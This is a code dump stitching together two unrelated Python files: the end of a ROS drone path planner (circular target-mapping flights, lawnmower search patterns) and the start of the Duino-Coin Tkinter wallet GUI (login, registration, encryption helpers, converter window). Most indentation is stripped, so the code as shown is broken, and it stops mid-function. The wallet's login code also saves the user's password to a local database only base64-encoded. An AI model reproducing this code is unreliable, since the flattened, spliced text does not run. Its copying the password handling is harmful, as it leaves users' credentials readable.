self.current_pose_.pose.position.y,
self.current_pose_.pose.position.z))
dist = np.linalg.norm(goal_p - current_p)
if self.got_cylinder_marker_:
self.cylinder_marker_pub_.publish(self.cylinder_marker_)
if dist < 0.2:
break
rospy.sleep(1.)
goal = uav_motion.msg.waypointsGoal()
goal.positions.append(self.goal_position_)
goal.yaws.append(yaws[i])
self.client_.send_goal(goal)
rospy.sleep(5.)
def getHeads(self, waypoints):
yaws = []
nm = waypoints.shape[0]
for i in range(nm-1):
            current_p = waypoints[i][:2]
            next_p = waypoints[i+1][:2]
            direction = next_p - current_p
            yaws.append(np.arctan2(direction[1], direction[0]))
yaws.append(0)
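        # Example with the startSearch() waypoints: the heading from (0, 0) toward (-15, 10)
        # is np.arctan2(10, -15) ≈ 2.55 rad; the last waypoint gets a heading of 0 because it
        # has no successor.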
return yaws
def poseCallback(self, pose):
self.current_pose_ = pose
self.poses.append(pose)
self.path.poses = self.poses
self.local_path_pub.publish(self.path)
def pointcloudCallback(self, pc_msg):
if self.mapping:
self.pc_map_ = pc_msg
#xyz = ros_numpy.point_cloud2.pointcloud2_to_xyz_array(pc_msg)
def targetPlanCallback(self, target_plan):
        if self.plan_mode_ == 0 and target_plan.mode.data != 0:
self.saved_pose_ = copy.deepcopy(self.current_pose_)
self.id_ = target_plan.id.data
self.plan_mode_ = target_plan.mode.data
if self.plan_mode_ != 0:
self.marker_ = target_plan.markers.markers[self.id_]
self.stop_srv_client_()
rospy.sleep(3.)
result = target_mapping.msg.TargetPlanResult()
if self.plan_mode_ == 1:
result.success = self.get_bcylinder_estimating_motion()
self.as_.set_succeeded(result)
elif self.plan_mode_ == 2:
result = self.getMapping()
self.as_.set_succeeded(result)
elif self.plan_mode_ == 0:
print("resuming")
save_position = Point()
save_position.x = self.saved_pose_.pose.position.x
save_position.y = self.saved_pose_.pose.position.y
save_position.z = self.saved_pose_.pose.position.z
q = self.saved_pose_.pose.orientation
yaw = euler_from_quaternion((q.x, q.y, q.z, q.w))[2]
goal = uav_motion.msg.waypointsGoal()
goal.positions.append(save_position)
goal.yaws.append(yaw)
self.client_.send_goal(goal)
            while not rospy.is_shutdown():
rospy.sleep(1.)
current_p = np.asarray((self.current_pose_.pose.position.x,
self.current_pose_.pose.position.y,
self.current_pose_.pose.position.z))
goal_p = np.asarray((save_position.x,
save_position.y,
save_position.z))
dist = np.linalg.norm(goal_p - current_p)
if dist < 0.2:
break
rospy.sleep(1.)
goal = uav_motion.msg.waypointsGoal()
goal.positions.append(self.goal_position_)
goal.yaws.append(self.goal_yaw_)
self.client_.send_goal(goal)
result.success = True
self.as_.set_succeeded(result)
def get_bcylinder_estimating_motion(self):
print('b-cylinder estimation motion')
# 1. generate a circle
# use the center of the marker, (x, y),
# and the current drone height, (h), as the circle center, (x, y, h).
# then we only need to decide the radius of the circle.
# assume the target is always in the center of the image,
# we can compute the angle between camera's z axis and horizontal plane, alpha.
# the circle will be determined by object center (x, y, z), h, and alpha
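        # Worked example with assumed values (not taken from the config): drone at h = 20 m,
        # target centre at z = 2 m, bcem_alpha = 60 degrees -> radius = (20 - 2) / tan(60 deg)
        # ≈ 18 / 1.73 ≈ 10.4 m.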
marker_position = np.asarray((self.marker_.pose.position.x, self.marker_.pose.position.y, self.marker_.pose.position.z))
drone_position = np.asarray((self.current_pose_.pose.position.x, self.current_pose_.pose.position.y, self.current_pose_.pose.position.z))
h = self.current_pose_.pose.position.z
circle_center = np.asarray((self.marker_.pose.position.x, self.marker_.pose.position.y, h))
radius = (h - marker_position[2])/np.tan(self.bcem_alpha)
# 2. sample keypoints
# from drone's closest point to the farthest point
# get the closest point
dir_cp = drone_position - circle_center
dir_cp = dir_cp/np.linalg.norm(dir_cp)
# cp = circle_center + dir_cp * radius
# get the farthest point
"""
# this is ok to find the farthest point that is farthest to the longest axis
marker_q = (self.marker_.pose.orientation.x, self.marker_.pose.orientation.y, self.marker_.pose.orientation.z, self.marker_.pose.orientation.w)
marker_rot = tf.transformations.quaternion_matrix(marker_q)
marker_scale = (self.marker_.scale.x, self.marker_.scale.y, self.marker_.scale.z)
idx = np.argmax(marker_scale)
long_axis = marker_rot[:, idx]
"""
# or the farthest point is the opposite of the closest point
positions = []
yaws = []
N = 25 # the number of key points on the trajectory
step = 4*np.pi/(N-1)
yaw_cp = np.arctan2(-dir_cp[1], -dir_cp[0])
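        # step = 4*pi/(N-1) spreads the N keypoints over two full revolutions around the target,
        # and accumulating yaw as yaw_cp + step*i keeps the heading continuous instead of letting
        # atan2 wrap from +pi to -pi (the issue noted in the comment below).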
for i in range(N):
dir_i = self.rotateDirection(dir_cp, step*i)
pos = circle_center + dir_i * radius
#yaw = np.arctan2(-dir_i[1], -dir_i[0]) # this will cause some issues because atan2 is not continuous
yaw = yaw_cp + step*i
positions.append(pos)
yaws.append(yaw)
self.sendWaypoints(positions, yaws)
return True
def getMapping(self):
print('mapping motion')
# get target position
marker_position = np.asarray((self.marker_.pose.position.x, self.marker_.pose.position.y, self.marker_.pose.position.z))
# get target points
points = np.asarray([(p.x, p.y, p.z) for p in self.marker_.points])
# extract points in 3 sigma
three_sigma_stds = points.std(axis=0) * 3
pillar_radius_0 = three_sigma_stds[:2].max()
pillar_top_0 = marker_position[2] + three_sigma_stds[2]
pillar_bottom_0 = marker_position[2] - three_sigma_stds[2]
# approximate points with a pillar
pillar_radius_1 = np.linalg.norm(points[:, :2] - marker_position[:2], axis=1).max() # the radius can also be defined by Gaussian sigma distance
pillar_top_1 = points[:, 2].max()
pillar_bottom_1 = points[:, 2].min() #+ pillar_radius * np.tan(self.alpha)
pillar_radius = min(pillar_radius_0, pillar_radius_1)
pillar_top = min(pillar_top_0, pillar_top_1)
pillar_bottom = min(pillar_bottom_0, pillar_bottom_1)
cylinder_pos = marker_position
cylinder_scale = [pillar_radius*2, pillar_radius*2, pillar_top - points[:, 2].min()]
self.cylinder_marker_ = self.create_cylinder_marker(pos=cylinder_pos, scale=cylinder_scale)
self.got_cylinder_marker_ = True
"""
# get target height (not real height, it's eigenvalue of the vertical vector)
marker_q = (self.marker_.pose.orientation.x, self.marker_.pose.orientation.y, self.marker_.pose.orientation.z,
self.marker_.pose.orientation.w)
marker_rot = tf.transformations.quaternion_matrix(marker_q)
height = (marker_rot[:, 0] * self.marker_.scale.x)[2]
"""
# map plan: sweep from bottom to top
## get circular planes
dist = 1.5 # distance to keep between drone and the closest pillar surface
half_vfov = self.half_vfov
h1 = dist * np.tan(self.alpha + half_vfov)
h2 = dist * np.tan(self.alpha - half_vfov)
d = h1 - h2
        N = int(np.ceil((pillar_top - pillar_bottom) / d))  # number of sweeping planes
heights = [pillar_bottom + d * i + h1 for i in range(N)]
n = 15 # number of waypoints on a circular path
radius = pillar_radius + dist
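        # Rough illustration with the angles assumed in the __init__ comment (alpha = 60 deg,
        # half_vfov = 20 deg): h1 ≈ 8.51 m, h2 ≈ 1.26 m, so each circular pass covers a band of
        # d ≈ 7.25 m and a 20 m tall pillar needs N = ceil(20 / 7.25) = 3 sweeping planes.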
## get start position
drone_position = np.asarray((self.current_pose_.pose.position.x, self.current_pose_.pose.position.y,
self.marker_.pose.position.z))
dir_cp = drone_position - marker_position
dir_cp = dir_cp/np.linalg.norm(dir_cp)
## get path points
positions = []
yaws = []
last_yaw = 0
for i in range(N):
center = np.asarray((marker_position[0], marker_position[1], heights[i]))
p, y = self.circularPoints(dir_cp, center, radius, n)
positions.append(p)
yaws.append(y)
positions = np.asarray(positions).reshape(-1, 3)
yaws = np.asarray(yaws).reshape(-1, 1)
start_p = positions[0]
start_y = yaws[0]
point = Point(start_p[0], start_p[1], start_p[2])
goal = uav_motion.msg.waypointsGoal()
goal.positions.append(point)
goal.yaws.append(start_y)
self.client_.send_goal(goal)
        while not rospy.is_shutdown():
rospy.sleep(1.)
current_p = np.asarray((self.current_pose_.pose.position.x,
self.current_pose_.pose.position.y,
self.current_pose_.pose.position.z))
dist = np.linalg.norm(start_p - current_p)
if dist < 0.2:
break
rospy.sleep(2.)
"""
pose = ResetPoseRequest()
pose.x = self.current_pose_.pose.position.x
pose.y = self.current_pose_.pose.position.y
pose.z = self.current_pose_.pose.position.z
q = self.current_pose_.pose.orientation
euler = euler_from_quaternion((q.x, q.y, q.z, q.w))
pose.roll = euler[0]
pose.pitch = euler[1]
pose.yaw = euler[2]
#self.setPose_srv_client_(pose)
"""
self.mapping = True
self.resumeMap_srv_client_()
self.sendWaypoints(positions[1:], yaws[1:])
last_p = positions[-1]
        while not rospy.is_shutdown():
rospy.sleep(1.)
current_p = np.asarray((self.current_pose_.pose.position.x,
self.current_pose_.pose.position.y,
self.current_pose_.pose.position.z))
dist = np.linalg.norm(last_p - current_p)
if dist < 0.2:
break
self.mapping = False
# save pointcloud map
print('saving map')
pc_map_msg = copy.copy(self.pc_map_)
o3d_pc = convertCloudFromRosToOpen3d(pc_map_msg)
# downsampling
o3d_pc = o3d_pc.voxel_down_sample(0.05)
# extract points in a sphere
sphere_center = cylinder_pos
sphere_radius = np.linalg.norm(np.asarray(cylinder_scale)/2.)
pts = np.asarray(o3d_pc.points)
clrs = np.asarray(o3d_pc.colors)
in_sphere_bools = [np.linalg.norm(pt - sphere_center) <= sphere_radius for pt in pts]
in_pts = pts[in_sphere_bools]
in_clrs = clrs[in_sphere_bools]
map_pcd = o3d.geometry.PointCloud()
map_pcd.points = o3d.utility.Vector3dVector(in_pts)
map_pcd.colors = o3d.utility.Vector3dVector(in_clrs)
pcd_name = os.path.join(self.pcd_path, str(self.id_) + ".pcd")
o3d.io.write_point_cloud(pcd_name, map_pcd)
self.newMap_srv_client_()
self.deleteMap_srv_client_()
self.pauseMap_srv_client_()
self.got_cylinder_marker_ = False
result = target_mapping.msg.TargetPlanResult()
        if len(in_pts) > 0:  # succeed only if some map points actually fell inside the sphere
result.success = True
result.pointcloud_map = convertCloudFromOpen3dToRos(map_pcd, 'map')
else:
result.success = False
return result
def circularPoints(self, dir_cp, center, radius, n):
positions = []
yaws = []
step = 2 * np.pi / n
yaw_cp = np.arctan2(-dir_cp[1], -dir_cp[0])
for i in range(n):
dir_i = self.rotateDirection(dir_cp, step * i)
pos = center + dir_i * radius
# yaw = np.arctan2(-dir_i[1], -dir_i[0]) # this will cause some issues because atan2 is not continuous
yaw = yaw_cp + step * i
positions.append(pos)
yaws.append(yaw)
return positions, yaws
    def rotateDirection(self, d, theta):
        # Rotate the direction vector d by theta radians about the z axis
        # (callers always pass horizontal directions, i.e. d[2] == 0).
        r = np.array(((np.cos(theta), -np.sin(theta), 0),
                      (np.sin(theta), np.cos(theta), 0),
                      (0, 0, 1)))
        return np.matmul(r, d)
def sendWaypoints(self, positions, yaws):
goal = uav_motion.msg.waypointsGoal()
for i in range(len(yaws)):
p = positions[i]
yaw = yaws[i]
point = Point(p[0], p[1], p[2])
goal.positions.append(point)
goal.yaws.append(yaw)
self.client_.send_goal(goal)
def lawnmower(self, pt1, pt2, origin, spacing, vertical):
"""
:param pt1: start point (x, y)
:param pt2: end point (x, y)
:param origin: uav origin (x, y)
:param spacing:
:param vertical:
:return:
"""
origin = np.array(origin)
pt1 = np.array(pt1) - origin
pt2 = np.array(pt2) - origin
x1, y1 = pt1
x2, y2 = pt2
width = x2 - x1
length = y2 - y1
waypoints = [np.array((0., 0.)), pt1]
if vertical:
if width < 0:
spacing = - spacing
N = int(width / spacing / 2)
for i in range(N):
pt_0 = waypoints[-1]
pt_1 = pt_0 + np.array((0, length))
pt_2 = pt_1 + np.array((spacing, 0))
pt_3 = pt_2 + np.array((0, -length))
pt_4 = pt_3 + np.array((spacing, 0))
waypoints.append(pt_1)
waypoints.append(pt_2)
waypoints.append(pt_3)
waypoints.append(pt_4)
else:
if length < 0:
spacing = - spacing
N = int(length / spacing / 2)
for i in range(N):
pt_0 = waypoints[-1]
pt_1 = pt_0 + np.array((width, 0))
pt_2 = pt_1 + np.array((0, spacing))
pt_3 = pt_2 + np.array((-width, 0))
pt_4 = pt_3 + np.array((0, spacing))
waypoints.append(pt_1)
waypoints.append(pt_2)
waypoints.append(pt_3)
waypoints.append(pt_4)
waypoints.append(pt2)
return np.array(waypoints)
def plot_path(self, waypoints):
waypoints = np.array(waypoints)
x = waypoints[:, 0]
y = waypoints[:, 1]
plt.plot(x, y)
plt.show()
def add_height(self, waypoints, height):
N = waypoints.shape[0]
new_waypoints = np.zeros((N, 3))
new_waypoints[:, :2] = waypoints
new_waypoints[:, 2] = height
return new_waypoints
def create_cylinder_marker(self, pos=[0, 0, 0], qua=[0, 0, 0, 1], scale=[1, 1, 1]):
"""
:param pos: [x, y, z]
:param qua: [x, y, z, w]
:param scale: [diameter_x, diameter_y, height]; the first two params are diameters for an ellipse
:return:
"""
marker = Marker()
marker.header.frame_id = "map"
marker.header.stamp = rospy.Time.now()
marker.ns = "target_mapping"
marker.id = 0
marker.type = visualization_msgs.msg.Marker.CYLINDER
marker.action = visualization_msgs.msg.Marker.ADD
marker.scale.x = scale[0]
marker.scale.y = scale[1]
marker.scale.z = scale[2]
marker.color.a = .5
marker.color.r = 0.0
marker.color.g = 0.0
marker.color.b = 0.5
marker.pose.position.x = pos[0]
marker.pose.position.y = pos[1]
marker.pose.position.z = pos[2]
marker.pose.orientation.x = qua[0]
marker.pose.orientation.y = qua[1]
marker.pose.orientation.z = qua[2]
marker.pose.orientation.w = qua[3]
return marker
if __name__ == '__main__':
rospy.init_node('path_planner', anonymous=False)
path_planner = PathPlanner()
path_planner.startSearch()
try:
rospy.spin()
except rospy.ROSInterruptException:
rospy.loginfo("Node killed!")
Wallet.py
#!/usr/bin/env python3
##########################################
# Duino-Coin Tkinter GUI Wallet (v2.4)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
import sys
from base64 import b64decode, b64encode
from configparser import ConfigParser
from datetime import datetime
from json import loads
from json import loads as jsonloads
from locale import getdefaultlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from socket import socket
from sqlite3 import connect as sqlconn
from subprocess import check_call
from threading import Thread, Timer
from time import sleep, time
from tkinter import (BOTH, END, LEFT, RIGHT, Button, Checkbutton, E, Entry,
Frame, IntVar, Label, Listbox, N, PhotoImage, S,
Scrollbar, StringVar, Tk, Toplevel, W, messagebox, ttk)
from tkinter.font import Font
from urllib.request import urlopen, urlretrieve
from webbrowser import open_new_tab
from requests import get
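# Note: later code in this file references names that are not imported above (e.g. Image and
# ImageTk from Pillow, Fernet/InvalidToken, hashes and PBKDF2HMAC from cryptography, Notify from
# notifypy, Presence from pypresence, PrivateKey from tronpy, the b64e/b64d base64 aliases,
# secrets, and globals such as backend, wduco, TRONPY_ENABLED, pool_address and pool_port).
# These are presumably set up elsewhere in the full wallet source (not shown in this excerpt);
# a minimal sketch of the third-party imports, assuming the usual libraries, would be:
#   from base64 import urlsafe_b64encode as b64e, urlsafe_b64decode as b64d
#   import secrets
#   from PIL import Image, ImageTk
#   from cryptography.fernet import Fernet, InvalidToken
#   from cryptography.hazmat.primitives import hashes
#   from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
#   from cryptography.hazmat.backends import default_backend
#   backend = default_backend()
#   from notifypy import Notify
#   from pypresence import Presence
#   from tronpy.keys import PrivateKey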
# Version number
VERSION = 2.4
# Colors
BACKGROUND_COLOR = "#121212"
FONT_COLOR = "#fffdee"
FOREGROUND_COLOR = "#ff9f43"
FOREGROUND_COLOR_SECONDARY = "#fdcb6e"
# Minimum transaction amount to be saved
MIN_TRANSACTION_VALUE = 0.00000000001
# Minimum transaction amount to show a notification
MIN_TRANSACTION_VALUE_NOTIFY = 0.5
# Resources folder location
resources = "Wallet_" + str(VERSION) + "_resources/"
ENCRYPTION_ITERATIONS = 100_000
config = ConfigParser()
wrong_passphrase = False
global_balance = 0
oldbalance = 0
balance = 0
unpaid_balance = 0
profitCheck = 0
curr_bal = 0
def install(package):
    check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, *sys.argv)
def get_duco_price():
global duco_fiat_value
jsonapi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
if jsonapi.status_code == 200:
try:
content = jsonapi.content.decode()
contentjson = loads(content)
duco_fiat_value = round(float(contentjson["Duco price"]), 4)
except Exception:
duco_fiat_value = 0.003
else:
duco_fiat_value = 0.003
Timer(30, get_duco_price).start()
def title(title):
if osname == "nt":
system("title " + title)
else:
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def _derive_key(
password: bytes,
salt: bytes,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
        iterations=iterations,
backend=backend)
return b64e(kdf.derive(password))
def password_encrypt(
message: bytes,
password: str,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
salt = secrets.token_bytes(16)
key = _derive_key(
password.encode(),
salt,
        iterations)
return b64e(
b"%b%b%b" % (
salt,
            iterations.to_bytes(4, "big"),
b64d(Fernet(key).encrypt(message))))
def password_decrypt(
token: bytes,
password: str) -> bytes:
    decoded = b64d(token)
    salt, iterations, token = decoded[:16], decoded[16:20], b64e(
        decoded[20:])
    iterations = int.from_bytes(iterations, "big")
    key = _derive_key(
        password.encode(),
        salt,
        iterations)
return Fernet(key).decrypt(token)
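# Minimal usage sketch for the two helpers above (illustrative only):
#   token = password_encrypt(b"my private key", "passphrase")
#   assert password_decrypt(token, "passphrase") == b"my private key"
# The encoded token layout is: 16-byte salt | 4-byte big-endian iteration count | the
# (base64-decoded) Fernet ciphertext, wrapped together again by the b64e helper.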
def get_string(string_name):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def openTos(handler):
open_new_tab("https://github.com/revoxhere/duino-coin#terms-of-usage")
def openGitHub(handler):
open_new_tab("https://github.com/revoxhere/duino-coin")
def openWebsite(handler):
open_new_tab("https://duinocoin.com")
def openExchange(handler):
open_new_tab("https://revoxhere.github.io/duco-exchange/")
def openDiscord(handler):
open_new_tab("https://discord.com/invite/kvBkccy")
def openTransaction(hashToOpen):
open_new_tab("https://explorer.duinocoin.com/?search="+str(hashToOpen))
class LoginFrame(Frame):
def __init__(self, master):
super().__init__(master)
master.title("Login")
master.resizable(False, False)
TEXT_FONT_BOLD = Font(size=12, weight="bold")
TEXT_FONT = Font(size=12, weight="normal")
self.duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
self.duco.image = self.duco
self.ducoLabel = Label(
self, background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=self.duco)
self.ducoLabel2 = Label(
self,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("welcome_message"),
font=TEXT_FONT_BOLD)
self.spacer = Label(self)
self.label_username = Label(
self,
text=get_string("username"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.label_password = Label(
self,
text=get_string("passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.entry_username = Entry(
self,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.entry_password = Entry(
self,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.ducoLabel.grid(
row=0,
sticky="nswe",
pady=(5, 0),
padx=(5))
self.ducoLabel2.grid(
row=1,
sticky="nswe",
padx=(5))
self.label_username.grid(
row=4,
sticky=W,
pady=(5, 0))
self.entry_username.grid(
row=5,
sticky=N,
padx=(5))
self.label_password.grid(
row=6,
sticky=W)
self.entry_password.grid(
row=7,
sticky=N)
self.logbtn = Button(
self,
text=get_string("login"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._login_btn_clicked,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(5, 1))
self.regbtn = Button(
self,
text=get_string("register"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._register_btn_clicked,
font=TEXT_FONT_BOLD)
self.regbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(0, 5))
self.configure(background=BACKGROUND_COLOR)
self.master.bind(
"<Return>",
self._login_btn_clicked_bind)
self.pack()
def _login_btn_clicked_bind(self, event):
self._login_btn_clicked()
def _login_btn_clicked(self):
global username, password
username = self.entry_username.get()
password = self.entry_password.get()
if username and password:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv(64).decode("utf8").rstrip("\n")
response = response.split(",")
if response[0] == "OK":
passwordEnc = b64encode(bytes(password, encoding="utf8"))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO
UserData(username, password, useWrapper)
VALUES(?, ?, ?)""",
(username, passwordEnc, "False"))
con.commit()
root.destroy()
else:
messagebox.showerror(
title=get_string("login_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("login_error"),
message=get_string("fill_the_blanks_warning"))
def _registerprotocol(self):
emailS = email.get()
usernameS = username.get()
passwordS = password.get()
confpasswordS = confpassword.get()
if emailS and usernameS and passwordS and confpasswordS:
if passwordS == confpasswordS:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(
bytes(
"REGI,"
+ str(usernameS)
+ ","
+ str(passwordS)
+ ","
+ str(emailS),
encoding="utf8"))
response = soc.recv(128).decode("utf8").rstrip("\n")
response = response.split(",")
if response[0] == "OK":
messagebox.showinfo(
title=get_string("registration_success"),
message=get_string("registration_success_msg"))
register.destroy()
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("register_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("fill_the_blanks_warning"))
def _register_btn_clicked(self):
global username, password, confpassword, email, register
root.destroy()
register = Tk()
register.title(get_string("register"))
register.resizable(False, False)
TEXT_FONT_BOLD = Font(
register,
size=12,
weight="bold")
TEXT_FONT = Font(
register,
size=12,
weight="normal")
tos_warning = get_string("register_tos_warning")
import textwrap
tos_warning = textwrap.dedent(tos_warning)
tos_warning = "\n".join(l for line in tos_warning.splitlines()
for l in textwrap.wrap(line, width=20))
duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
duco.image = duco
ducoLabel = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=duco)
ducoLabel.grid(
row=0,
padx=5,
pady=(5, 0),
sticky="nswe")
ducoLabel2 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("register_on_network"),
font=TEXT_FONT_BOLD)
ducoLabel2.grid(row=1,
padx=5,
sticky="nswe")
def colorLabelBlue(handler):
ducoLabel3.configure(foreground="#6c5ce7")
def colorLabelNormal(handler):
ducoLabel3.configure(foreground=FONT_COLOR)
ducoLabel3 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=tos_warning,
font=TEXT_FONT)
ducoLabel3.grid(
row=2,
padx=5,
sticky="nswe")
ducoLabel3.bind("<Button-1>", openTos)
ducoLabel3.bind("<Enter>", colorLabelBlue)
ducoLabel3.bind("<Leave>", colorLabelNormal)
Label(
register,
text=get_string("username").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=3,
sticky=W,
padx=5,
pady=(5, 0))
username = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
username.grid(
row=4,
padx=5)
Label(
register,
text=get_string("passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=5,
sticky=W,
padx=5)
password = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
password.grid(
row=6,
padx=5)
Label(
register,
text=get_string("confirm_passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=7,
sticky=W,
padx=5)
confpassword = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
confpassword.grid(
row=8,
padx=5)
Label(
register,
text=get_string("email").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=9,
sticky=W,
padx=5)
email = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
email.grid(
row=10,
padx=5)
self.logbtn = Button(
register,
text=get_string("register"),
activebackground=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
command=self._registerprotocol,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5, 5),
pady=(5, 5))
register.configure(background=BACKGROUND_COLOR)
def loading_window():
global loading, status
loading = Tk()
loading.resizable(False, False)
loading.configure(background=BACKGROUND_COLOR)
loading.title(get_string("loading"))
try:
loading.iconphoto(True,
PhotoImage(file=resources + "duco_color.png"))
except Exception:
pass
TEXT_FONT = Font(loading,
size=10,
weight="bold")
TEXT_FONT_BOLD = Font(loading,
size=14,
weight="bold")
original = Image.open(resources + "duco_color.png")
resized = original.resize((128, 128), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(loading,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(row=0,
column=0,
sticky=N + S + E + W,
pady=(5, 0),
padx=(5))
Label(
loading,
text=get_string("duino_coin_wallet"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=1,
column=0,
sticky=S + W,
pady=(5, 0),
padx=5)
loading.update()
status = Label(
loading,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("loading_database"),
font=TEXT_FONT)
status.grid(
row=2,
column=0,
sticky=S + W,
pady=(0, 5),
padx=5)
loading.update()
def transactions_window(handler):
transactionsWindow = Toplevel()
transactionsWindow.resizable(False, False)
transactionsWindow.title(get_string("wallet_transactions"))
transactionsWindow.transient([root])
transactionsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
transactionsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
transactionsWindow,
size=12,
weight="normal")
Label(
transactionsWindow,
text=get_string("transaction_list"),
font=TEXT_FONT_BOLD_LARGE,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
Label(
transactionsWindow,
text=get_string("transaction_list_notice"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
listbox = Listbox(
transactionsWindow,
width="35",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
listbox.grid(
row=2,
column=0,
sticky=S + W + N + E,
padx=(5, 0),
pady=(0, 5))
scrollbar = Scrollbar(transactionsWindow,
background=BACKGROUND_COLOR)
scrollbar.grid(
row=2,
column=1,
sticky=N + S,
padx=(0, 5),
pady=(0, 5))
for i in gtxl:
listbox.insert(END, gtxl[i]["Sender"] + " to " + gtxl[i]
["Recipient"] + ": " + str(gtxl[i]["Amount"]) + " DUCO")
def get_selection(event):
try:
selection = listbox.curselection()[0]
openTransaction(gtxl[str(selection)]["Hash"])
except IndexError:
pass
listbox.bind("<Button-1>", get_selection)
listbox.config(yscrollcommand=scrollbar.set, font=TEXT_FONT)
scrollbar.config(command=listbox.yview)
def currency_converter_calc():
fromcurrency = fromCurrencyInput.get(fromCurrencyInput.curselection())
tocurrency = toCurrencyInput.get(toCurrencyInput.curselection())
amount = amountInput.get()
# TODO
value = duco_fiat_value * float(amount)
result = get_string("result") + ": " + str(round(value, 6))
conversionresulttext.set(str(result))
calculatorWindow.update()
def currency_converter_window(handler):
global conversionresulttext
global fromCurrencyInput
global toCurrencyInput
global amountInput
global calculatorWindow
calculatorWindow = Toplevel()
calculatorWindow.resizable(False, False)
calculatorWindow.title(get_string("wallet_calculator"))
calculatorWindow.transient([root])
calculatorWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(
calculatorWindow,
size=12,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
calculatorWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
calculatorWindow,
size=12,
weight="normal")
Label(
calculatorWindow,
text=get_string("currency_converter"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
columnspan=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Label(
calculatorWindow,
text=get_string("from"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=0,
sticky=S + W,
padx=5)
fromCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
font=TEXT_FONT,
foreground=FONT_COLOR,
width="20",
height="13",
)
